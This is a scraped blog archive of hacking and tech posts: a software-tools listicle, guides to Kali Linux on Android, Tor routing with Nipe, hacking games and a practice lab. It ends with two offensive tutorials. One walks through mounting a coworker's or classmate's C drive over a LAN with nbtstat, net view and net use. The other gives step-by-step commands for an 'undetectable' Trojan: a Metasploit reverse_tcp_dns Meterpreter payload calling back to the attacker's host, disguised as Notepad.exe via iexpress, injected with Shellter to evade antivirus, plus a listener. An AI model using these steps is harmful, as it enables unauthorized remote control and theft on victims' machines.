Showing posts with label Geek Stuffs. Show all posts
Showing posts with label Geek Stuffs. Show all posts
Web technologies are growing very fast both in number and in developments. In fact, individuals and businesses are finding it hard to keep up with the speed.

6 New Software Development Tools Coming in 2019


When new software development tools emerge, usually the old ones become gradually obsolete because new ones come with new and useful features. Therefore businesses should focus on new developments despite the cost involved in them because they tend to improve the efficiency of the site, user interaction and bring nicer looking interfaces.

In this case, here is a list of new and top software development tools that you should look forward to use in 2019;

1. Netbeans

NetBeans is a popular software development tool that is not only an open source but is also a free tool that is written in Java. NetBeans is useful when developing superlative desktop, mobile and web applications using Java, PHP, and C++ technologies.

This tool is very easy to use and therefore can develop an application within a short time. The good thing about NetBeans is that it is compatible with any operating system such as Solaris, Linux, Windows and Mac OS among others.

Its key features include writing bug-free code, smart code editing, quick user interface development, and easy management process. Being a Java application, you can be assured that you will easily update to its 2019 edition when it comes.

2. Ionic 2

Most people think that Ionic 2 is a tool for developing mobile apps, but they do not know that it is among the top software development tools you cannot miss in 2019. It is very useful when developing native and web optimized apps.

The good thing about this tool is that it is an open source tool and is free to use. Ionic 2 uses one code base regardless of the number of platforms, comes with high-end plugins and built-in push notifications, coded in angular, and has reliable community support such as StackOverflow and Slack.

3. Vue.Js

Vue.js is a part of Java Library that together with other tools combined forms a framework that is very useful in building web interfaces.

The tool came into the surface for the first time in the year 2013 and currently has acquired more than 84,000 Github stars leaving numerous tools behind. Since its establishment, the tool has progressed significantly whereby developers keep on adding new useful features for the better user interface.

One great thing about Vue.js is that it does not have the pedigree and therefore has very little baggage. It is like an update of development tools such as Angular and Reacts as it corrects all the errors that came with these two tools before they brought their newest versions.

4. Bootstrap

Bootstrap is another free and open source software development tool that is very useful when developing mobile-first projects and responsive websites.

The tool applies HTML, CSS and JS technologies to develop software. Bootstrap is highly recommended when you are designing a simple website because it will help you to do it faster based on the fact that it is very easy to use. Some of the good features of Bootstrap is the fact that you can customize everything based on your need, comes with many built-in components for easy development and there is an aspect of guaranteed consistency for all developers and users.

5. NPN

NPN can be defined as the package manager for Nodes in JavaScript, making it easier for web designers to discover different re-usable codes that can be assembled in a better way and be more expedient.

The tool has been used by many web developers as a command-line utility to assist in interaction with package repositories. NPM has more than 15,000 stars on Github. The key features for this tool include code discovery and re-usage, availability of more than 470,000 free code packages and the ability to manage private and public code on the same registry.

6. Typescript

TypeScript is an open source and free software development tool that is very useful in scripting language during web development. Unlike the strict syntactical superset of JavaScript, this tool allows the developer to add customized static typing.

This tool is very convenient for people who are developing large applications. TypeScript has more than 31,000 tools making it a front-end solution for language scripting in web development. The good thing about this tool is that you can use it in any system that JavaScript is running on because it is also compatible with other JavaScript libraries.


Software development tools will always be produced, and if new ones are not developed, the older ones will keep being updated to better versions, making them as good as new. The list above will help you when shopping for web development tools in the year 2019.


Author: Adrian Rubin

Adrian Rubin is an American photographer and story writer who gained his interest in graphics through playing video games when he was young. Apart from writing stories and taking photos, Adrian Rubin loves travelling and animals which makes him a humanitarian.


Wanna carry your Linux everywhere you go? It'll be a good idea to learn how to install Kali for Android phones.

How to Install Kali Linux on Android


Kali can be called a penetration testing Linux distro used by cryptographers and digital forensics. If you have no prior knowledge on this OS, you might wanna refer to HOW TO INSTALL KALI LINUX ON A SYSTEM since I've already broken it all down as well as installation tutorial on computers.

Penetration testing entails making use of a variety of tools and techniques in testing the limits of security procedures and policies. These days more apps are made available on the Android OS for smartphones and tablets every day, so it becomes somewhat worthwhile to have Kali Linux on your smartphone.



Unlike the Computer installation, follow the below steps closely and you'll find the android installation pretty easy

INSTALLING KALI LINUX ON THE ANDROID PHONE

Prerequisites
  • Android version 2.0 or higher
  • Full battery life
  • Nothing less than 5Gb of memory space (both internal and external)
  • A strong internet connection
I believe you have the above specs so let's continue; Rooted Android phones are required for this to work, so lemme start there:

1. Rooting Your Android Phone

Left to me I'd say have your phone rooted by an expert because a little mistake on your part might screw up your phone. However, if you can do it, what you first need to do is back up your phone data.

When that is done, go activate EOM unlocking and USB debugging in the smartphone's developer settings.

When the above steps are completed, head over to the Google developers site and download Android SDK tools and install it in a default directory. Or you can install it anywhere you can remember.

Uncheck everything in the displayed tab, then click to install two packages.

Note that this step is only for those with unrooted Android.

Install By Accepting Licenses

Find your way to your Android phone's manufacturer site and install the device drivers. Make sure the bootloader is unlocked.

Note that certain devices will ask you for an unlock key. Restart your Android to fastboot mode (done by pressing volume up+power on most devices).

Open a command prompt on your personal computer.

If your device requires a code, copy and paste it on your manufacturer's website. After the website form is submitted, you'll receive an email from your device manufacturer that contains a file, key and other necessary instructions for rooting your smartphone.

Get Kingo Root

How to Install Kali Linux on Android
Go and download the KingoRoot app from google play store. If you don't find it, a little google search will fix you. Install the application and make certain your phone is connected to your personal computer. 

Enable the debugging stuff in your Android and root your device.


2. Set up Linux deploy for Kali

How to Install Kali Linux on Android


NOTE for this procedure: Your Android phone should be rooted or have near you a rooting guide for your phone brand.

Download and install Linux deploy application from Google play store. Click on the download icon and select Kali distributions in the distributions tab.

Choose your installation type and location as well. You may decide to stick with the default settings but I recommend configuring up the deployment app yourself.

3. Installation

After configuring all the necessary stuff: You can go ahead to build the Kali image by pressing the install button at the top of the screen. This should take less than 5 minutes depending on your internet speed.


Installation boots a Kali Linux bootstrap directly from the Kali repository. By now Kali Linux is successfully installed.

4. VNC viewer app(optional)

Go download the VNC viewer app from google play store.

Now the steps to configure your VNC:


  • set Address to localhost 

  • set name to kali


When you must have finished the above steps, press the connect button and you'll find your Kali running on your Android.

How to Install Kali Linux on Android | installationThe Kali installation is prebuilt with a VNC or SSH server thus dropping the need to download one. So this step is optional.







5. The CHROOT mode

How to Install Kali Linux on Android | Chroot mode
Now you're done with the installation, let the Linux deploy mount and load your Kali Linux chroot image automatically. 

This step also means the start-up of SSH and VNC  servers to enhance easier remote access. Press the START symbol and this process will begin.


Note the IP address of your device. You'll be using it to log in to your kali session.

log in to chroot mode

Either use the SSH or VNC client to get yourself into your kali. The default VNC setup will be as follows;

  • username: android

  • Password/key: change

Important stuff you need know on using Kali Linux on Android

Linux deploy normally allocates 4GB of image size for a naked installation of kali. It is recommended you reconfigure the settings of the image size at the Linux deploy in case you need to install more utilities that might require huge space.

You might wanna check out how to use your Android as a security camera

Gotta use Tor browser properly right? Yeah, being anonymous while surfing online is a great idea.

NIPE: How to Anonymize your system completely with Tor


Tor is arguably the most popular onion browser out there, being able to run on Apple MacOS, Microsoft Windows and GNU/Linux(without installing any software).

Confused on what Tor actually is? Lemme put it this way; 

Tor browser protects your anonymity by bouncing your communications around a range of distributed networks of relay runs by aides all around the globe: it prohibits and ensures that somebody watching your Internet connection does not learn what sites you visit, it prevents the websites you browse through from knowing your physical location, and also lets you visit blocked websites.

Now, what is Nipe?

Nipe simply put, is a script to make Tor Network your Default Gateway.

This little Perl Script gives you access to route all your traffic directly from your
computer to the Tor Network. 

After it is all done, you can successfully surf the Internet Anonymously
without any worries of being tracked or traced back.


Let's get to it!

Download and install:

    cd nipe
    cpan install Switch JSON LWP::UserAgent

Commands needed:

    COMMAND          FUNCTION
    install                Install dependencies
    start                   Start routing
    stop                   Stop routing
    restart                Restart the Nipe process
    status                 See status

Examples:

    perl nipe.pl install
    perl nipe.pl start
    perl nipe.pl stop
    perl nipe.pl restart
    perl nipe.pl status
THE best free hacking games for android and ios?


Hacking has always been a fantasy worth exploring for many people. A lot of those people get to actually learn and work on their hacking skills, but only a few reach the great height of a pro.



Hacking is a serious profession. It is always portrayed by many to be all doom and gloom but isn't so. To better understand hacking and have fun while doing so, you might wanna try your luck against real-life world hackers in games.  

The below Android and iOS games help you take a break from the numerous security threats all around and have you a little fun. From the splendid VR environments, to tower defence strategy games. 

These free mobile/tablet games will stretch your already existing imagination and possibly even your hacking skills.

In no orderly fashion;

1. Hack Ex

Best free hacking games for Android and ios

In this game, users face off against each other by continuous attempts to crack into bank accounts or other accounts in order to upload viruses into the system to generate funds to further their hacking efforts.

Hacking into other hackers devices grants you access to spy on other players and then cover your tracks through manipulation of logs.

Players get the location of opponents by scanning and identifying IPs with the help of a Firewall. The better the discrepancy surrounding these levels, the less likely a particular hack will be successful. 

Hack Ex makes use of in-game currency (Bitcoin) to purchase and equip new hacking gadgets and superior smartphones.


2. Hacker's Quest

Best free hacking games for Android and ios
A player can pay as much as he likes for this game. But even without paying a dime, one can still enjoy the whole game without limitations. 

Hacker's Quest is basically an addictive text adventure that requires great hackers to reveal dark secrets.

Inspired by the popular Linux shell brand, your smartphone gets to turns into a hacking terminal in an instant. You'll get to know plenty individuals and firms - some will be good and others evil. 

Always listen to your own knowledge of human nature and put trust in your IT skills to grab this thrilling adventure. Perform well and you'll be a big boy in this virtual world.

This game is a much more realistic depiction of the hacking world than most with a great deal of social engineering instead of pure hardware and software getting the job done. 

Basic knowledge of terminal commands will make the early levels a little too easy, but with awesome 55 levels of hacking, there is still plenty to really test your skills.




3. Cyber Hacker


A big apology to great hackers out there, but Cyber Hacker is the nearest thing to an actual hacking environment you will find on Android or iOS. 



With a rating of 4.6/5.0 on App store, the game is basically puzzle solving with lots of password cracking, virus uploads, DDoS attacks and a beautiful dose of social engineering. 



It begins with you as a freelance hacker taking jobs for Bitcoin. Even at the very beginning, the threat of Interpol tracking you down is ever present. 


Techniques, like remembering the various structure of file systems and adequately phishing employees before attempting a hack are vital in the game. You also need to take proper advantage of all the tools available (definitely take the tutorial). 

While this game is still a less version of hacking, it provides a more complete picture than most games of the same genre.


4. Hack RUN Series

Best free hacking games for Android and ios
Ever wanted to be somewhat a hacker? Crack into the very heart of a mysterious organization to uncover their darkest secrets. Hack RUN® uses 'old school' commands (like UNIX or DOS) that simulate a real-life OS.

Learn and master the command prompts of each system in order to navigate through your adventure. 


This gaming series is a text-based interactive storyline that has begotten five series on iOS, with the first two available on Android.

All the series follow the same structure: the player with the help of a terminal interface will try to hack into the various accounts of employees within the mysteriously RUN organization.

The game really is about puzzle solving as you seek to decipher valuable data in emails and websites within the system.

While this game isn’t going to be for you a path to hacking greatness, the storyline is engaging and the developer doesn't seem to stop churning out sequels to keep fans engaged.

Download Hack RUN for Android
Download Hack RUN for Ios

5. vHack XT

Best free hacking games for Android and ios
Try your best to outsmart other hackers and level up your reputation as the best geek around in vHack XT. If you're one of those that enjoy some social interaction in their games, then you're in luck because this game is one of the few hacking games that offer this functionality.

Players can chat with one another and “cluster” allows a maximum of 10 players to work together and create an in-game private chat room.

 To successfully hack, players scan for target's IP location and compare their stats to the target to determine the possibility of success.

While vHack XT isn’t the most visually appealing of the games in this genre, it offers an addictive gameplay along with an active community that will always bring you back.

Download vHack XT for Android

6. Hackers

This article explains the Best free hacking games for Android and ios
One of the best free hacking games out there, Hackers pits you against various real-world hackers in a towerlike defence style strategy game.

The darknet has never been so widely accessible! This high-end cyber combat interface helps you to research important programs, fight for your nation in the First World Cyberwar and build your hacker's prestige.

Players build up their own type of network while acquiring and upgrading tools to attack targets either via stealth with three known distinct mission types or through brute force attack. 



Note that while all the above-listed games can bring you closer to what hacking looks like, they don't accurately depict the real world of hacking.

The best free hacking games for Android and ios have been done justice to, now you might wanna check out how to hack Clash of Clans or how to turn your android phone into a spy camera


Hello!

As a new guy in the hacking world, I bet you'd want to know how to create a virtual hacking lab. If you don't know what this is or you just don't care enough to create one, I suggest you read this post thoroughly because it is highly essential.


How to Create a Virtual Hacking Lab



The hacking lab creates a safe environment to practice your hacks. This way you won't have to worry about the risk of failure when trying a hack in the real world because any slip off can be devastating.


Hacking isn't like most professions. In most, you fail and dust yourself off. But in this, you fail and probably spend some time behind bars. This makes practising very important, and this is where the virtual hacking lab comes in.


Many newbies find it pretty difficult to set up a dedicated lab to practice hacks. This article does justice to this problem.

I'll be breaking the tutorial down in 6 steps to make it easier to comprehend;


  1. Download VMware Workstation or Player
  2. Download Kali VMware Images
  3. Unzip Images
  4. Open VMware Image
  5. Download & Install Targets
  6. Download Old Applications

Let's go!

Step 1: Download VMware Workstation or Player

You should practice hacking within a virtual environment. You set up a hacking system like Kali Linux, and some victims to exploit. Essentially, you'll likely want multiple OS and software to enable you try out a variety of hacks.

How to Create a Virtual Hacking Lab


Virtual machines and a virtual network offer the safest way to set up a hacking lab. 


There are numerous virtualization systems available, including Oracle's VirtualBox, KVM, Microsoft's Virtual PC and Hyper-V, Citrix, and VMware's Workstation, VMware Player and ESXi.


In a case of a lab environment, I recommend VMware's Workstation or Player. The workstation is a purchasable product that costs as high as $200 after the free 30-day trial, while the Player is free-to-use.


The difference between these two is that the Workstation can both create and play, while the Player is used to just play VMs.


Download VMware's Workstation or Player here.


Step 2; Download Kali VMware Images

After you must have installed the virtualization system, your next step is to download the VMware images of Linux(provided by offensive language). These images help you to run from Workstation or player instead of creating a virtual machine. 



These images have already been created by Offensive Security. This basically means that you can then use it in either Workstation or Player once you download the VM of Kali.


Step 3; Unzip Images

You need to unzip the downloaded files using one of the several free available zip utilities like WinZip, WinArchiver, etc. 


Download and install the one that suits your fancy and unzip the files. The screenshot below shows the unzipped Kali files using the free trial of WinZip.



Step 4; Open VMware Image

When you must have unzipped all the files, your next step is to open up the virtual machine. Be sure to know the location you unzipped the VM image.

Next is to open the Player or the VMware Workstation. Go to file and open like in the below image.

How to Create a Virtual Hacking Lab


This opens a window like in the below image.


This shows the VMware VM file that you're gonna load into VMware. Note that I'm using the "amd64" which is simply the 64-bit version. The 32-bit version will work though, but a lil bit slower.

Next, after you do so, VMware starts your VM and displays the below image.





Now, hit the little green button in your screen that says "Power on this virtual machine." It will now display a Kali screen.

How to Create a Virtual Hacking Lab

Use "root" as User and "toor" as Password to get started hacking!


Step 5; Download & Install Targets

Now, download and install your target system. You could use your own host Windows system since this is merely a practice, you might wanna use an older and easier to hack system. 


I recommend installing a Windows Vista, XP, Server 2003, or an older version of Linux. You can use these systems to practice hacking since they have known security vulnerabilities. Later, when you think you're climbing up the ladder, you can now install and use Windows 7 and 8 for your hacks.


If you don't have a copy of these older OS, you can easily purchase them on the internet. At last check, it was sold for as low as $9.66 on Amazon, but that can change anytime.


Alternatively, you can get these OS for free on torrent sites, but BEWARE!..you'll likely be downloading more than you bargained for.


These free downloads often come with rootkits that embed in your system when you open the file.


You can get older versions of Linux from the distribution.

f

Step 6; Download Old Applications

Now that you have your operating system, you're gonna be needing apps and software to run on these older versions. These older versions have plenty known security flaws that you can check your hacking skills.


You can use the website "Old Apps" to download many of these.

How to Create a Virtual Hacking Lab

Hit me up in the comment section if you got stuff to say or add on how to create a virtual hacking lab.


Subscribe to my mailing list

* indicates required

Hi there✋. 


Have you ever wondered how easy or possible it is to hack into your pal's computer? Or maybe you know it's possible but do not know the steps to follow. 



I say to you; bring out your note if you ain't with your computer. Keep reading lad.




I've always been asked by viewers on how to hack a computer. I'll be showing you one of my tricks. This trick is done in 4 steps;

  1. Getting started
  2. Trial and error
  3. Gathering necessary information
  4. Getting in

Before you keep reading though, i'll suggest you take a look at our disclaimer page.
Let's get to work!



How to hack into A Computer connected to the same network(Lan)

This trick is perfect for those working in an office where everyone is connected to the same network. It can also be carried out in a College.

What you need

  • Windows OS
  • Cain and Abel

The obvious first thing to do is find a Computer to hack into. You can begin if you're connected to the WAN or plugged into the LAN.

Open up your Cain and Abel. Get it here if you don't have it installed,

This hacking program has a built-in sniffer feature that looks for all available IP addresses in a local subnet. 

Now pay attention!

Step 1

Getting started!

Click on the sniffer tab after the software opens. Click the Start/Stop sniffer, and click the blue cross.

5 Easy steps to Hack Into a Computer



Another window will pop up after this, select “All host in my subnet” and click ok.


It'll now begin to scan

5 Easy steps to Hack Into a Computer


The Computer names, IP's and mac addresses will display. Write them down and try to remember the IP address you wish to hack into. It's okay if you can't tell whether the IP address belongs to a Computer, modem, router etc.

The next step will tell you what to do.




Step 2

Trial and error

This stage is here in case you don't know if what you have is a Computer, printer, router or whatever else is connected to the WAN.

If you did get the IP address of the target though, I still recommend you read through this
section.

Click on the start menu, type in cmd, and click ok.

This will bring up the command prompt which is where you'll be doing most of the hacking.

Next, you'll be reading certain commands in quotes that you'll need to be input into the command prompt. Do not by any way put these commands in quotes. It won't work. I put quotes only to avoid confusing you.

Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”

This lets you know if the target is online or not

It will look something like this if the target is online.

5 Easy steps to Hack Into a Computer

It will look like this if the target is offline:

5 Easy steps to Hack Into a Computer

This hack can only be done if the target is online. So switch to a different target if it's not or wait for it to come online.

You'd wanna know how to crack a wifi password and a website

Step 3

Gathering necessary information.

Input this command “nbtstat –a (IP address of target).” A suitable example would be
“nbtstat –a 192.168.1.103.”

This will display if file sharing is enabled. If it is, it will give you the; currently logged on user,  computer name and workgroup.

5 Easy steps to Hack Into a Computer



Step 4

Getting In

It’s time!.

By now you should know that: your target is online, has file sharing, and the computer name.

Locate the shared drives or printers. Type “net view (IP Address of Target)”
Example for this tutorial would be: “net view 192.168.1.103”



You just found the share name. In this case, "C" is under the share name signalling that C is the only shared thing on the PC or computer.

To the right, "Disk" is displayed under Type. Meaning that it is the actual C DISK of the computer. The C DISK is most times an entire person’s hard drive.



If you observe carefully, for my hack I already used “K,” so now I use “G” instead. You may do the same for multiple hacks.

It will say “The command completed successfully.” if it worked.

You may have to go retrace your steps if it didn't.

Now open “my computer” under the start menu. There your recently created network
drive will be there.



Note that you won't be able to access this drive if you disconnect from the WAN or LAN. Hence the name Network Drive.

Don't worry though, you won't have to repeat the same procedure all over again since the drive will not be deleted after you disconnect. You can still access it whenever you reconnect.



Congratulations! You’re DONE HACKING!



Commands used;

  • PING
  • NBTSTAT -a (IP Address of Target)
  • NET VIEW (IP Address of Target)
  • NET USE K: (IP Address of Target)(SHARENAME)

Program used;

Cain and Abel.

Pretty easy right? this sums up the steps to hack into a Computer.




Subscribe to my mailing list

* indicates required


spyhood | Introduction to Trojan Horse


I am pretty sure you’ve come across the movie "Troy", where Brad Pitt played Achilles. Like in the movie, a Trojan Horse is much similar to the wooden horse which was used to trick the soldiers of Troy into sneaking enemy warriors in their city.




A Trojan tends to look like a safe bet but isn’t. A Trojan horse hides malware in what appears to be a normal activity. Once entered, they will be connected to the host system and begin to pull the plugs of your computer without your consent and knowledge.


The behaviour of Trojan is in default daemon. You won’t know it is present in your computer system. At least not unless you’re a pentesting pro -). There are numerous ways a Trojan horse can look like.


1)       It sometimes looks like a malicious instruction that is hidden inside a legitimate program and carries out actions that are unwarranted and are unwanted by the user.

2)      A legit software source is altered by attaching a Trojan to it. One can easily execute this file with the help of a stub, and the legit program read as a byte. Once done, the user will see the program functioning normally and will never suspect that a Trojan was also entered into their system without his consent.


Trojans, in general, are spread by some form of social engineering. A quick example is clicking on a fake advert online, or a scenario where a user is tricked into executing an email attachment camouflaged to look unsuspicious.


Trojans may in effect allow an attacker access into the user’s information like passwords, personal identity and banking information.

Some of the most common Trojans


spyhood | Introduction to Trojan Horse


Ø  Downloader Trojan: The main focus of this kind of Trojan is to download additional malware into the already infected computer.


Ø  Backdoor Trojan: This Trojan allows the attacker access to the computer by creating a “backdoor”.


Ø  Infostealer Trojan: This kind of Trojan is specifically made to steal data from the infected computer.


Ø  Remote access Trojan: A Trojan that gives the attacker full control over the computer system.


Ø  DDoS attack Trojan: Designed to carry out DDoS attacks which flood a network with traffic, thereby taking it down.


 How to keep strong and not get wrecked by a Horse


I’ve been telling you lots of stuff on Trojan Horse which might have aroused your interest or gotten you a bit worried. Get excited bruh because Trojans aren’t bulletproof. Let’s take a look at some protection techniques;

spyhood | Introduction to Trojan Horse



Ø  Always be on the lookout for new updates for your operating system’s software. It is advisable to do this as soon as such an update comes online from the software company. The reason behind this is because attackers tend to exploit security vulnerabilities in outdated software.


Ø  Run periodic scans with your software. Computer security should begin with an internet security suite. You should set it up in a way that the program runs scans automatically in regular intervals.


Ø  Stop visiting unsafe websites. This can be done with the help of internet security suites which alerts the user if the site he’s about to visit is unsafe.


Ø  Protect all your accounts with very strong, unique passwords.


Ø  Always keep your personal information safe with a firewall.


      You must be wondering "okay, how do I know that my computer is infected?"


     My answer to that is to always be on the lookout for the following;


  •        Does your PC keep talking to you? displaying annoying popups and messages telling you that your PC is infected and in need of protection? It can also come in a form of an advert.

  •        Applications don't start. If you've ever tried to run a program from the start menu and nothing happens, or sometimes a different program starts, then you should worry. This could be another problem though, but it is one of the many symptoms of an infected computer.

  •       The computer is running extremely slow. This could be as a result of many things, including a Trojan.
        
  •       You find it difficult to connect to an internet or it runs extremely slow even though the guy next to you is browsing with ease.

  •       What happened to my files? Even my antivirus! 

  •      I connect to the Internet, and different windows open or the browser provides pages I did not request

  •     If your computer starts speaking a funny language. If the default language of applications changes, the screen displays back-to-front… you really check your computer because you might just have an infected system.


Mobile Apps aren't spared from Trojan


Trojans don’t just wreck laptops and desktop machines. They can also cause havoc on a mobile device. The amount of risk taken is basically the same, except that before completing an installation on an Android app, you’ll get a giant list of all the stuff you’re giving the application access to.



The major difference between a computer and an Android phone is that it’s pretty easier to get updates and choose anti-virus protection on pc, while you have to rely solely on Google to do the work.


Computer protection is constantly being improved, while mobile protection still lives a huge gap.

You should, however, note that if a Trojan is being executed in a restrictive environment like in a case of a non-root user in a UNIX system, the Trojan will most likely not function properly(though it can still pose some great threat). But in a scenario where it is executed in a windows environment, the Trojan will be able to carry out all its functionality because the windows security is more vulnerable than the Unix.



How do Hackers create an undetectable Trojan Horse?


There'll be no point to this introduction if I don't show an example of how hackers develop Trojans. There isn't a specific rule or method. Each hacker does whatever works for him, and i'm gonna share what works here. Quite basic actually.

However, you should note that in no way is Spyhood responsible for the actions you perform with this piece of knowledge. Check the disclaimer page for more info on that.

First, let's look at the list of things you'll be needing in order to perform this task;








  • Windows
  • Kali Linux
  • A No IP account with a domain name
  • Shellter
  • A forwarded port on your router
Now let's dive in 👇to the steps

spyhood | Introduction to Trojan Horse



First step; create the DNS payload using Kali Linux


  • Open Metasploit on Kali Linux by typing msfconsole in a terminal.

  • Type use payload/windows/meterpreter/reverse_tcp_dns.

  • Type show options. You will be prompted to set your lhost and lport.

  • Type set lhost (hostname you created, without http://).

  • Type set lport (port you forwarded on your router set for the Linux machine).

  • Type generate -h to display all options for generating the payload.

  • Type generate -f (file title you chose for the payload) -p windows -t raw. Example; generate -f DNS -p windows -t raw

  • Exit the terminal and click on Files.

  • Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).


Second step; create the executable file on Windows


  • For 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator). For 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (select run as administrator)

  • Select Create new Self Extraction Directive File.

  • Click next on the Package Purpose page.

  • Name the package.  Ex: Notepad.exe

  • No Prompt, click next.

  • Do not display a license.

  • Click Add and select any file on your computer. Choose Notepad.exe in the C:\Windows\System32 folder.

  • Click the drop arrow and select the file name you choose on the last screen.

  • Choose Hidden and then click next.

  • No Message. Click Next

  • Click Browse to create a title for your malware file. Then choose a destination path. Check the Hide File Extracting Progress Animation from user.

  • Select No restart.

  • You can either choose to save the self-extraction or not.

  • Click Next on the create Package. Then Finish.

Third step; use both created files in shellter to create Trojan Horse



  • Open the Shellter folder. Right click on Shellter.exe and run as Administrator.

  • Type A for Auto.

  • Type N for No.

  • Type the location of the EXE file you created from the second step and hit enter. Let Shellter do its thing for a minute.

  • Type C for custom when asked to choose payload, 

  • Type the location of the payload you created in the first step and hit enter.

  • Type N for No reflective DLL loader.

  • Press enter to allow Shellter do its thing. You should have a working undetectable Trojan Horse If it says Injection Verified!

  • Press enter to exit Shellter.

The final step; set your listener


I'm gonna use Armitage for this tutorial.







  • Go back to Kali Linux.

  • Open the Terminal and type Msfupdate.

  • Type apt-get install armitage.

  • Type msfdb init.

  • Open Armitage.

  • Click Connect.

  • Click Yes.

  • When Armitage opens, type: use exploit/multi/handler

  • Type set lhost 0.0.0.0

  • Type set lport (the exact port you forwarded in your router)

  • Type set payload windows/meterpreter/reverse tcp dns

  • Type set exitonsession false

  • (Optional.) Type set autorunscript migrate -f

  • (Optional.) Type set prependmigrate True

  • Type exploit -j

Optional steps are used in order to migrate the entire process automatically so the session does not end before you get the chance to do it manually.



Your Trojan Horse is ready. Don't forget to check my disclaimer page to check out the part Spyhood plays in all this. Also, connect with me on Facebook if you will.





Subscribe to my mailing list

* indicates required